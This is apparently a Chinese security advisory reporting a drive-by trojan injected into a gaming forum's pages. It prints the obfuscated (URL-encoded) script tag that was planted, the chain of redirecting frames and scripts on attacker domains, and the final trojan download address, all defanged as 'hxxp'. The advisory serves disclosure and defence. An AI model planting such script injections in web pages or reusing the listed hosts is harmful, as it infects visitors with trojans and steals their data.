游戏基地论坛被植入恶意代码
6月6日,游戏基地论坛(hxxp://bbs.gamespot.com.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。
MalUrl:hxxp://bbs.gamespot.com.cn/viewthread.php?tid=15660
网页被嵌入恶意链接代码:
<script language=”javascript” type=”text/javascript” src=”hxxp://%77%77%77%2E%63%6E%76%2E%6F%72%67%2E%63%6E/%70%6F%70%2E%67%69%66″></script>
挂马分析:
[wide]hxxp://bbs.gamespot.com.cn/viewthread.php?tid=15660
[script]hxxp://%77%77%77%2e%63%6e%76%2e%6f%72%67%2e%63%6e/%70%6f%70%2e%67%69%66
[frame]hxxp://dasd22e.cn/08/0008.htm?22
[frame]hxxp://dasd22e.cn/08/index.html
[frame]hxxp://dasd22e.cn/08/xyqm.htm
[script]hxxp://dasd22e.cn/08/js.js
[frame]hxxp://dasd22e.cn/08/xy14.htm
[frame]hxxp://dasd22e.cn/08/xyfl.htm
[frame]hxxp://dasd22e.cn/08/xyff.htm
[frame]hxxp://dasd22e.cn/08/z.htm
[frame]hxxp://dasd22e.cn/08/xyvod.htm
[frame]hxxp://dasd22e.cn/08/xyxxz.htm
[frame]hxxp://dasd22e.cn/08/ytlb.htm
[frame]hxxp://dasd22e.cn/08/xy122121.htm
[script]hxxp://js.tongji.linezing.com/1116244/tongji.js
[frame]hxxp://www.wrmfwf.cn/mbyd/1.htm
最终下载病毒文件:
hxxp://sadw222.cn/xh8.exe
通过执行以上病毒文件,来达到完全控制访问者的系统。
为防止病毒二次传播链接hxxp部分被置换为hxxp
关键字:游戏基地恶意代码
